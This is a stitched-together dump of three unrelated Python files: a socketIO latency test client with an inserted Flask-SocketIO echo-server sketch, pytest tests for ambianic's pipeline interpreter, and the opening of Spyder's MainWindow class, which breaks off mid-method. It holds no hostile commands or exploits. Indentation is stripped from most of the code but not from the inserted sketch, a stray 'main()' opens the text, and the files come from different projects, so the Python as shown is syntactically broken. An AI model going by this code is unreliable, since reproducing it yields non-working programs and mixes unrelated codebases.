main()
|
test_socket_client.py
|
from threading import Thread
import time
from socketIO_client import SocketIO
host = 'localhost'
port = 5000
class TwoWayClient(object):
def on_event(self, event):
print(event)
def __init__(self):
self.socketio = SocketIO(host, port)
self.socketio.on('latencyResponse', self.on_event)
self.receive_events_thread = Thread(target=self._receive_events_thread)
self.receive_events_thread.daemon = True
self.receive_events_thread.start()
while True:
self.socketio.emit('latency', {'timestamp': int(time.time())})
def _receive_events_thread(self):
self.socketio.wait(seconds=0.1)
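# Hedged sketch (not part of the original test): a minimal server-side counterpart that
# would answer the 'latency' events emitted above with 'latencyResponse'. It assumes
# Flask-SocketIO is installed and speaks a Socket.IO protocol version compatible with
# the socketIO_client library used by TwoWayClient; imports are local so that importing
# this module stays unaffected.
def run_latency_echo_server():
    from flask import Flask
    from flask_socketio import SocketIO, emit
    app = Flask(__name__)
    socketio = SocketIO(app)
    @socketio.on('latency')
    def on_latency(message):
        # Echo the client's timestamp back so it can measure round-trip latency.
        emit('latencyResponse', message)
    socketio.run(app, host=host, port=port)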
def main():
TwoWayClient()
if __name__ == "__main__":
main()
|
test_interpreter_more.py
|
"""More test cases for ambianic.interpreter module."""
import logging
import threading
import time
from ambianic import pipeline
from ambianic.pipeline import interpreter
from ambianic.pipeline.avsource.av_element import AVSourceElement
from ambianic.pipeline.interpreter import (
HealingThread,
Pipeline,
PipelineServer,
PipelineServerJob,
)
log = logging.getLogger()
log.setLevel(logging.DEBUG)
def setup_module(module):
"""setup any state specific to the execution of the given module."""
# Reset default class
interpreter.PIPELINE_CLASS = None
interpreter.Pipeline.PIPELINE_OPS["source"] = AVSourceElement
def teardown_module(module):
"""teardown any state that was previously setup with a setup_module
method."""
# Reset default class
interpreter.PIPELINE_CLASS = None
interpreter.Pipeline.PIPELINE_OPS["source"] = AVSourceElement
class _TestSourceElement(pipeline.PipeElement):
"""Produce one sample and exit start loop."""
def __init__(self, **element_config):
super().__init__()
self.config = element_config
self.start_called = False
self.stop_called = False
def start(self):
self.start_called = True
super().start()
# send one sample down the pipe
self.receive_next_sample(sample=[1, 2, 3])
def stop(self):
self.stop_called = True
super().stop()
def _get_config(source_class=None):
# override source op with a mock test class
Pipeline.PIPELINE_OPS["source"] = source_class
server_config = {
"pipelines": {"pipeline_one": [{"source": {"uri": "test"}}]},
}
return server_config
def test_pipeline_server_init():
conf = _get_config(_TestSourceElement)
server = PipelineServerJob(conf)
assert len(server._pipelines) == 1
assert len(server._threaded_jobs) == 1
def _get_config_invalid_element(source_class=None):
# override source op with a mock test class
Pipeline.PIPELINE_OPS["source"] = source_class
pipeline_config = [
{"source": {"uri": "test"}},
{"scifi": {"one": "day soon"}},
]
return pipeline_config
class _TestPipeline(Pipeline):
def __init__(self, pname=None, pconfig=None):
self._test_on_unknown_pipe_element_called = False
self._test_on_healing_already_in_progress_called = False
self._test_on_start_no_elements_called = False
super().__init__(pname=pname, pconfig=pconfig)
def _on_unknown_pipe_element(self, name=None):
self._test_on_unknown_pipe_element_called = True
log.debug("_on_unknown_pipe_element called")
super()._on_unknown_pipe_element(name=name)
def _on_healing_already_in_progress(self):
self._test_on_healing_already_in_progress_called = True
super()._on_healing_already_in_progress()
def _on_start_no_elements(self):
self._test_on_start_no_elements_called = True
super()._on_start_no_elements()
def test_pipeline_init_invalid_element():
conf = _get_config_invalid_element(_TestSourceElement)
pipeline = _TestPipeline(pname="test", pconfig=conf)
assert pipeline._test_on_unknown_pipe_element_called
assert len(pipeline._pipe_elements) == 1
assert isinstance(pipeline._pipe_elements[0], _TestSourceElement)
class _TestSourceElement2(pipeline.PipeElement):
"""Produce samples until stop signal."""
def __init__(self, **element_config):
super().__init__()
self.config = element_config
self._test_element_started = threading.Event()
def start(self):
super().start()
self._test_element_started.set()
# generate samples until stopped
while self.state == pipeline.PIPE_STATE_RUNNING:
self.receive_next_sample(sample=[1, 2, 3])
def test_pipeline_server_start_stop():
conf = _get_config(_TestSourceElement2)
server = PipelineServerJob(conf)
assert len(server._pipelines) == 1
assert len(server._threaded_jobs) == 1
source_pe = server._pipelines[0]._pipe_elements[0]
assert source_pe.state == pipeline.PIPE_STATE_STOPPED
assert not server._threaded_jobs[0].is_alive()
server.start()
source_pe._test_element_started.wait(timeout=3)
assert source_pe.state == pipeline.PIPE_STATE_RUNNING
assert server._threaded_jobs[0].is_alive()
server.stop()
# give it enough time to clean up resources
# in child threads (if any).
time.sleep(3)
assert source_pe.state == pipeline.PIPE_STATE_STOPPED
assert not server._threaded_jobs[0].is_alive()
def test_pipeline_server_config_change():
conf = _get_config(_TestSourceElement2)
PipelineServer(conf)
del conf["pipelines"]["pipeline_one"][0]
class _TestSourceElement3(pipeline.PipeElement):
"""Produce samples until stop signal."""
def __init__(self, **element_config):
super().__init__()
self._test_heal_called = threading.Event()
self._test_sample_released = threading.Event()
log.debug("heal() not called yet")
def heal(self):
self._test_heal_called.set()
log.debug("heal() called")
def start(self):
super().start()
        # send samples until stopped
while self.state == pipeline.PIPE_STATE_RUNNING:
self.receive_next_sample(sample=[1, 2, 3])
            # artificial delay to force heal()
log.debug("delaying next sample to cause heal()")
time.sleep(2)
self._test_sample_released.set()
time.sleep(2)
def test_pipeline_server_heal():
conf = _get_config(_TestSourceElement3)
server = PipelineServerJob(conf)
assert len(server._pipelines) == 1
assert len(server._threaded_jobs) == 1
source_pe = server._pipelines[0]._pipe_elements[0]
assert source_pe.state == pipeline.PIPE_STATE_STOPPED
assert not server._threaded_jobs[0].is_alive()
server.MAX_HEARTBEAT_INTERVAL = 1
server.start()
source_pe._test_sample_released.wait(timeout=5)
assert source_pe.state == pipeline.PIPE_STATE_RUNNING
assert server._threaded_jobs[0].is_alive()
server.healthcheck()
assert source_pe._test_heal_called.wait(timeout=5)
server.stop()
assert source_pe.state == pipeline.PIPE_STATE_STOPPED
assert not server._threaded_jobs[0].is_alive()
class _TestPipelineServer2(PipelineServerJob):
def __init__(self, config=None):
super().__init__(config=config)
self._test_on_terminal_health_called = threading.Event()
def _on_terminal_pipeline_health(self, pipeline=None, lapse=None):
log.debug("_on_terminal_pipeline_health called")
super()._on_terminal_pipeline_health(pipeline, lapse)
self._test_on_terminal_health_called.set()
def test_pipeline_terminal_health():
conf = _get_config(_TestSourceElement3)
server = _TestPipelineServer2(conf)
assert len(server._pipelines) == 1
assert len(server._threaded_jobs) == 1
source_pe = server._pipelines[0]._pipe_elements[0]
server.TERMINAL_HEALTH_INTERVAL = 1
server.start()
source_pe._test_sample_released.wait(timeout=5)
server.healthcheck()
assert server._test_on_terminal_health_called.wait(timeout=5)
server.stop()
assert source_pe.state == pipeline.PIPE_STATE_STOPPED
assert not server._threaded_jobs[0].is_alive()
class _TestDummyElement(pipeline.PipeElement):
"""Dummy pass through element."""
def __init__(self, **element_config):
super().__init__()
self._config = element_config
self._test_heal_called = False
_sample_processed = False
def process_sample(self, sample=None):
assert sample == [1, 2, 3]
self._sample_processed = True
yield {"sample": sample}
def _get_pipeline_config_2_elements():
# override source op with a mock test class
Pipeline.PIPELINE_OPS["source"] = _TestSourceElement
Pipeline.PIPELINE_OPS["dummy"] = _TestDummyElement
pipeline_config = [{"source": {"uri": "test"}}, {"dummy": {"dummy": "config"}}]
return pipeline_config
def test_pipeline_start2():
conf = _get_pipeline_config_2_elements()
pipeline = _TestPipeline(pname="test", pconfig=conf)
assert len(pipeline._pipe_elements) == 2
assert isinstance(pipeline._pipe_elements[0], _TestSourceElement)
assert isinstance(pipeline._pipe_elements[1], _TestDummyElement)
pipeline.start()
dummy = pipeline._pipe_elements[1]
assert dummy._sample_processed
pipeline.stop()
class _TestSourceElement4(pipeline.PipeElement):
"""Produce samples until stop signal."""
def __init__(self, **element_config):
super().__init__()
self.config = element_config
def start(self):
super().start()
self.receive_next_sample(sample=[1, 2, 3])
def heal(self):
# delay to test 2xheal()
time.sleep(2)
def test_pipeline_heal2():
Pipeline.PIPELINE_OPS["source"] = _TestSourceElement4
pipeline_config = [
{"source": {"uri": "test"}},
]
pipeline = _TestPipeline(pname="test", pconfig=pipeline_config)
assert len(pipeline._pipe_elements) == 1
assert isinstance(pipeline._pipe_elements[0], _TestSourceElement4)
pipeline.start()
pipeline.heal()
assert not pipeline._test_on_healing_already_in_progress_called
pipeline.heal()
assert pipeline._test_on_healing_already_in_progress_called
pipeline.stop()
def test_pipeline_start_no_elements():
Pipeline.PIPELINE_OPS["source"] = _TestSourceElement4
pipeline_config = [{"source": "unavailable"}]
pipeline = _TestPipeline(pname="test", pconfig=pipeline_config)
assert len(pipeline._pipe_elements) == 0
pipeline.start()
assert pipeline._test_on_start_no_elements_called
def test_healing_thread():
_target_called = False
def target():
nonlocal _target_called
_target_called = True
raise RuntimeError()
_on_finished_called = False
def on_finished():
nonlocal _on_finished_called
_on_finished_called = True
raise RuntimeError()
healer = HealingThread(target=target, on_finished=on_finished)
healer.run()
assert _target_called
assert _on_finished_called
class _TestPipelineServer5(PipelineServerJob):
_test_on_threaded_job_ended_called = False
def _on_pipeline_job_ended(self, threaded_job=None):
self._test_on_threaded_job_ended_called = True
super()._on_pipeline_job_ended(threaded_job=threaded_job)
class _TestSourceElement5(pipeline.PipeElement):
"""Produce one sample and exit start loop."""
def __init__(self, **element_config):
super().__init__()
self.config = element_config
def start(self):
super().start()
# send one sample down the pipe
self.receive_next_sample(sample=[1, 2, 3])
super().stop()
def test_on_pipeline_job_ended():
conf = _get_config(_TestSourceElement5)
server = _TestPipelineServer5(conf)
assert len(server._pipelines) == 1
assert len(server._threaded_jobs) == 1
source_pe = server._pipelines[0]._pipe_elements[0]
assert source_pe.state == pipeline.PIPE_STATE_STOPPED
assert not server._threaded_jobs[0].is_alive()
server.start()
# give time to pipeline job to exit
time.sleep(2)
server.healthcheck()
assert source_pe.state == pipeline.PIPE_STATE_STOPPED
assert not server._threaded_jobs
|
mainwindow.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific Python Development Environment
=====================================================
Developed and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from collections import OrderedDict
from enum import Enum
import errno
import gc
import logging
import os
import os.path as osp
import shutil
import signal
import socket
import sys
import threading
import traceback
#==============================================================================
# Check requirements before proceeding
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()
#==============================================================================
# Third-party imports
#==============================================================================
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QCoreApplication, Qt, QTimer, Signal, Slot,
qInstallMessageHandler)
from qtpy.QtGui import QColor, QKeySequence
from qtpy.QtWidgets import (QApplication, QMainWindow, QMenu, QMessageBox,
QShortcut, QStyleFactory)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
from qtawesome.iconic_font import FontError
#==============================================================================
# Local imports
# NOTE: Move (if possible) imports of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
#==============================================================================
from spyder import __version__
from spyder import dependencies
from spyder.app.find_plugins import (
find_external_plugins, find_internal_plugins)
from spyder.app.utils import (
create_application, create_splash_screen, create_window, ORIGINAL_SYS_EXIT,
delete_debug_log_files, qt_message_handler, set_links_color, setup_logging,
set_opengl_implementation)
from spyder.api.plugin_registration.registry import PLUGIN_REGISTRY
from spyder.config.base import (_, DEV, get_conf_path, get_debug_level,
get_home_dir, get_module_source_path,
is_pynsist, running_in_mac_app,
running_under_pytest, STDERR)
from spyder.config.gui import is_dark_font_color
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.manager import CONF
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
from spyder.otherplugins import get_spyderplugins_mods
from spyder.py3compat import configparser as cp, PY3, to_text_string
from spyder.utils import encoding, programs
from spyder.utils.icon_manager import ima
from spyder.utils.misc import (select_port, getcwd_or_home,
get_python_executable)
from spyder.utils.palette import QStylePalette
from spyder.utils.qthelpers import (create_action, add_actions, file_uri,
qapplication, start_file)
from spyder.utils.stylesheet import APP_STYLESHEET
# Spyder API Imports
from spyder.api.exceptions import SpyderAPIError
from spyder.api.plugins import (
Plugins, SpyderPlugin, SpyderPluginV2, SpyderDockablePlugin,
SpyderPluginWidget)
#==============================================================================
# Windows only local imports
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Constants
#==============================================================================
# Module logger
logger = logging.getLogger(__name__)
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
CWD = getcwd_or_home()
#==============================================================================
# Install Qt message handler
#==============================================================================
qInstallMessageHandler(qt_message_handler)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = (
QMainWindow.AllowTabbedDocks | QMainWindow.AllowNestedDocks |
QMainWindow.AnimatedDocks
)
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
sig_setup_finished = Signal()
all_actions_defined = Signal()
# type: (OrderedDict, OrderedDict)
sig_pythonpath_changed = Signal(object, object)
sig_main_interpreter_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent")
sig_moved = Signal("QMoveEvent")
sig_layout_setup_ready = Signal(object) # Related to default layouts
# ---- Plugin handling methods
# ------------------------------------------------------------------------
def get_plugin(self, plugin_name, error=True):
"""
Return a plugin instance by providing the plugin class.
"""
if plugin_name in PLUGIN_REGISTRY:
return PLUGIN_REGISTRY.get_plugin(plugin_name)
if error:
raise SpyderAPIError(f'Plugin "{plugin_name}" not found!')
return None
def get_dockable_plugins(self):
"""Get a list of all dockable plugins."""
dockable_plugins = []
for plugin_name in PLUGIN_REGISTRY:
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
if isinstance(plugin, (SpyderDockablePlugin, SpyderPluginWidget)):
dockable_plugins.append((plugin_name, plugin))
return dockable_plugins
def is_plugin_enabled(self, plugin_name):
"""Determine if a given plugin is going to be loaded."""
return PLUGIN_REGISTRY.is_plugin_enabled(plugin_name)
def is_plugin_available(self, plugin_name):
"""Determine if a given plugin is available."""
return PLUGIN_REGISTRY.is_plugin_available(plugin_name)
def show_status_message(self, message, timeout):
"""
Show a status message in Spyder Main Window.
"""
status_bar = self.statusBar()
if status_bar.isVisible():
status_bar.showMessage(message, timeout)
def show_plugin_compatibility_message(self, message):
"""
Show a compatibility message.
"""
messageBox = QMessageBox(self)
messageBox.setWindowModality(Qt.NonModal)
messageBox.setAttribute(Qt.WA_DeleteOnClose)
messageBox.setWindowTitle(_('Compatibility Check'))
messageBox.setText(message)
messageBox.setStandardButtons(QMessageBox.Ok)
messageBox.show()
def register_plugin(self, plugin_name, external=False, omit_conf=False):
"""
Register a plugin in Spyder Main Window.
"""
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
self.set_splash(_("Loading {}...").format(plugin.get_name()))
logger.info("Loading {}...".format(plugin.NAME))
# Check plugin compatibility
is_compatible, message = plugin.check_compatibility()
plugin.is_compatible = is_compatible
plugin.get_description()
if not is_compatible:
            self.show_plugin_compatibility_message(message)
return
# Connect Plugin Signals to main window methods
plugin.sig_exception_occurred.connect(self.handle_exception)
plugin.sig_free_memory_requested.connect(self.free_memory)
plugin.sig_quit_requested.connect(self.close)
plugin.sig_redirect_stdio_requested.connect(
self.redirect_internalshell_stdio)
plugin.sig_status_message_requested.connect(self.show_status_message)
if isinstance(plugin, SpyderDockablePlugin):
plugin.sig_focus_changed.connect(self.plugin_focus_changed)
plugin.sig_switch_to_plugin_requested.connect(
self.switch_to_plugin)
plugin.sig_update_ancestor_requested.connect(
lambda: plugin.set_ancestor(self))
# Connect Main window Signals to plugin signals
self.sig_moved.connect(plugin.sig_mainwindow_moved)
self.sig_resized.connect(plugin.sig_mainwindow_resized)
# Register plugin
plugin._register(omit_conf=omit_conf)
if isinstance(plugin, SpyderDockablePlugin):
# Add dockwidget
self.add_dockwidget(plugin)
# Update margins
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
if plugin_name == Plugins.Shortcuts:
for action, context, action_name in self.shortcut_queue:
self.register_shortcut(action, context, action_name)
self.shortcut_queue = []
logger.info("Registering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
if getattr(action, 'register_shortcut', True):
if isinstance(action_name, Enum):
action_name = action_name.value
if Plugins.Shortcuts in PLUGIN_REGISTRY:
self.register_shortcut(action, context, action_name)
else:
self.shortcut_queue.append((action, context, action_name))
if isinstance(plugin, SpyderDockablePlugin):
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = None
sc = QShortcut(QKeySequence(), self,
lambda: self.switch_to_plugin(plugin))
sc.setContext(Qt.ApplicationShortcut)
plugin._shortcut = sc
if Plugins.Shortcuts in PLUGIN_REGISTRY:
self.register_shortcut(sc, context, name)
self.register_shortcut(
plugin.toggle_view_action, context, name)
else:
self.shortcut_queue.append((sc, context, name))
self.shortcut_queue.append(
(plugin.toggle_view_action, context, name))
def unregister_plugin(self, plugin):
"""
Unregister a plugin from the Spyder Main Window.
"""
logger.info("Unloading {}...".format(plugin.NAME))
# Disconnect all slots
signals = [
plugin.sig_quit_requested,
plugin.sig_redirect_stdio_requested,
plugin.sig_status_message_requested,
]
for sig in signals:
try:
sig.disconnect()
except TypeError:
pass
# Unregister shortcuts for actions
logger.info("Unregistering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
self.shortcuts.unregister_shortcut(action, context, action_name)
# Unregister switch to shortcut
shortcut = None
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except Exception:
pass
if shortcut is not None:
self.shortcuts.unregister_shortcut(
plugin._shortcut,
context,
"Switch to {}".format(plugin.CONF_SECTION),
)
# Remove dockwidget
logger.info("Removing {} dockwidget...".format(plugin.NAME))
self.remove_dockwidget(plugin)
plugin._unregister()
def create_plugin_conf_widget(self, plugin):
"""
Create configuration dialog box page widget.
"""
config_dialog = self.prefs_dialog_instance
if plugin.CONF_WIDGET_CLASS is not None and config_dialog is not None:
conf_widget = plugin.CONF_WIDGET_CLASS(plugin, config_dialog)
conf_widget.initialize()
return conf_widget
@property
def last_plugin(self):
"""
Get last plugin with focus if it is a dockable widget.
If a non-dockable plugin has the focus this will return by default
the Editor plugin.
"""
# Needed to prevent errors with the old API at
# spyder/plugins/base::_switch_to_plugin
return self.layouts.get_last_plugin()
def maximize_dockwidget(self, restore=False):
"""
This is needed to prevent errors with the old API at
spyder/plugins/base::_switch_to_plugin.
See spyder-ide/spyder#15164
Parameters
----------
restore : bool, optional
If the current dockwidget needs to be restored to its unmaximized
state. The default is False.
"""
self.layouts.maximize_dockwidget(restore=restore)
def switch_to_plugin(self, plugin, force_focus=None):
"""
Switch to this plugin.
Notes
-----
This operation unmaximizes the current plugin (if any), raises
this plugin to view (if it's hidden) and gives it focus (if
possible).
"""
last_plugin = self.last_plugin
try:
# New API
if (last_plugin is not None
and last_plugin.get_widget().is_maximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
except AttributeError:
# Old API
if (last_plugin is not None and self.last_plugin._ismaximized
and last_plugin is not plugin):
self.layouts.maximize_dockwidget()
try:
# New API
if not plugin.toggle_view_action.isChecked():
plugin.toggle_view_action.setChecked(True)
plugin.get_widget().is_visible = False
except AttributeError:
# Old API
if not plugin._toggle_view_action.isChecked():
plugin._toggle_view_action.setChecked(True)
plugin._widget._is_visible = False
plugin.change_visibility(True, force_focus=force_focus)
def remove_dockwidget(self, plugin):
"""
Remove a plugin QDockWidget from the main window.
"""
self.removeDockWidget(plugin.dockwidget)
try:
self.widgetlist.remove(plugin)
except ValueError:
pass
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets."""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
def tabify_plugin(self, plugin, default=None):
"""
Tabify the plugin using the list of possible TABIFY options.
Only do this if the dockwidget does not have more dockwidgets
in the same position and if the plugin is using the New API.
"""
def tabify_helper(plugin, next_to_plugins):
for next_to_plugin in next_to_plugins:
try:
self.tabify_plugins(next_to_plugin, plugin)
break
except SpyderAPIError as err:
logger.error(err)
# If TABIFY not defined use the [default]
tabify = getattr(plugin, 'TABIFY', [default])
if not isinstance(tabify, list):
next_to_plugins = [tabify]
else:
next_to_plugins = tabify
# Check if TABIFY is not a list with None as unique value or a default
# list
if tabify in [[None], []]:
return False
# Get the actual plugins from the names
next_to_plugins = [self.get_plugin(p) for p in next_to_plugins]
# First time plugin starts
if plugin.get_conf('first_time', True):
if (isinstance(plugin, SpyderDockablePlugin)
and plugin.NAME != Plugins.Console):
logger.info(
"Tabify {} dockwidget for the first time...".format(
plugin.NAME))
tabify_helper(plugin, next_to_plugins)
# Show external plugins
if plugin.NAME in PLUGIN_REGISTRY.external_plugins:
plugin.get_widget().toggle_view(True)
plugin.set_conf('enable', True)
plugin.set_conf('first_time', False)
else:
# This is needed to ensure plugins are placed correctly when
# switching layouts.
logger.info("Tabify {} dockwidget...".format(plugin.NAME))
# Check if plugin has no other dockwidgets in the same position
if not bool(self.tabifiedDockWidgets(plugin.dockwidget)):
tabify_helper(plugin, next_to_plugins)
return True
def handle_exception(self, error_data):
"""
This method will call the handle exception method of the Console
plugin. It is provided as a signal on the Plugin API for convenience,
        so that plugins do not need to explicitly call the Console plugin.
Parameters
----------
error_data: dict
The dictionary containing error data. The expected keys are:
>>> error_data= {
"text": str,
"is_traceback": bool,
"repo": str,
"title": str,
"label": str,
"steps": str,
}
Notes
-----
The `is_traceback` key indicates if `text` contains plain text or a
Python error traceback.
The `title` and `repo` keys indicate how the error data should
customize the report dialog and Github error submission.
The `label` and `steps` keys allow customizing the content of the
error dialog.
"""
console = self.get_plugin(Plugins.Console, error=False)
if console:
console.handle_exception(error_data)
def __init__(self, splash=None, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if running_under_pytest():
self._proxy_style = None
else:
from spyder.utils.qthelpers import SpyderProxyStyle
# None is needed, see: https://bugreports.qt.io/browse/PYSIDE-922
self._proxy_style = SpyderProxyStyle(None)
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
# Set Windows app icon to use .ico file
if os.name == "nt":
qapp.setWindowIcon(ima.get_icon("windows_app_icon"))
self.default_style = str(qapp.style().objectName())
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
if options.project is not None and not running_in_mac_app():
self.open_project = osp.normpath(osp.join(CWD, options.project))
else:
self.open_project = None
self.window_title = options.window_title
logger.info("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
            # Make Spyder quit when pressing Ctrl+C in the console
# In DEV Ctrl+C doesn't quit, because it helps to
# capture the traceback when spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
self.shortcut_queue = []
# Handle Spyder path
self.path = ()
self.not_active_path = ()
self.project_path = ()
# New API
self._APPLICATION_TOOLBARS = OrderedDict()
self._STATUS_WIDGETS = OrderedDict()
        # Mapping of new plugin identifiers vs old attribute
        # names given for plugins or to prevent collisions with other
        # attributes, i.e. layout (Qt) vs layout (SpyderPluginV2)
self._INTERNAL_PLUGINS_MAPPING = {
'console': Plugins.Console,
'maininterpreter': Plugins.MainInterpreter,
'outlineexplorer': Plugins.OutlineExplorer,
'variableexplorer': Plugins.VariableExplorer,
'ipyconsole': Plugins.IPythonConsole,
'workingdirectory': Plugins.WorkingDirectory,
'projects': Plugins.Projects,
'findinfiles': Plugins.Find,
'layouts': Plugins.Layout,
}
self.thirdparty_plugins = []
# File switcher
self.switcher = None
# Preferences
self.prefs_dialog_size = None
self.prefs_dialog_instance = None
# Actions
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
# Menu bars
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
# TODO: Move to corresponding Plugins
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.menus = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
self.CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
        if set_windows_appusermodelid is not None:
res = set_windows_appusermodelid()
logger.info("appusermodelid: %s", res)
# Setting QTimer if running in travis
test_app = os.environ.get('TEST_CI_APP')
if test_app is not None:
app = qapplication()
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(app.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = splash
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See spyder-ide/spyder#4132.
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: {color}\'><b>netsh winsock reset "
"</b></span><br>").format(
color=QStylePalette.COLOR_BACKGROUND_4))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
# Apply main window settings
self.apply_settings()
# To set all dockwidgets tabs to be on top (in case we want to do it
# in the future)
# self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North)
logger.info("End of MainWindow constructor")
# ---- Window setup
def _update_shortcuts_in_panes_menu(self, show=True):
"""
Display the shortcut for the "Switch to plugin..." on the toggle view
action of the plugins displayed in the Help/Panes menu.
Notes
-----
SpyderDockablePlugins provide two actions that function as a single
action. The `Switch to Plugin...` action has an assignable shortcut
via the shortcut preferences. The `Plugin toggle View` in the `View`
        application menu uses a custom `Toggle view action` that displays the
shortcut assigned to the `Switch to Plugin...` action, but is not
triggered by that shortcut.
"""
for plugin_name in PLUGIN_REGISTRY:
plugin = PLUGIN_REGISTRY.get_plugin(plugin_name)
if isinstance(plugin, SpyderDockablePlugin):
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if show:
section = plugin.CONF_SECTION
try:
context = '_'
name = 'switch to {}'.format(section)
shortcut = CONF.get_shortcut(
context, name, plugin_name=section)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = QKeySequence()
else:
shortcut = QKeySequence()
action.setShortcut(shortcut)
def setup(self):
"""Setup main window."""
PLUGIN_REGISTRY.sig_plugin_ready.connect(
lambda plugin_name, omit_conf: self.register_plugin(
plugin_name, omit_conf=omit_conf))
PLUGIN_REGISTRY.set_main(self)
# TODO: Remove circular dependency between help and ipython console
# and remove this import. Help plugin should take care of it
from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH
logger.info("*** Start of MainWindow setup ***")
logger.info("Updating PYTHONPATH")
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
logger.info("Applying theme configuration...")
ui_theme = CONF.get('appearance', 'ui_theme')
color_scheme = CONF.get('appearance', 'selected')
if ui_theme == 'dark':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = str(APP_STYLESHEET)
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
elif ui_theme == 'light':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
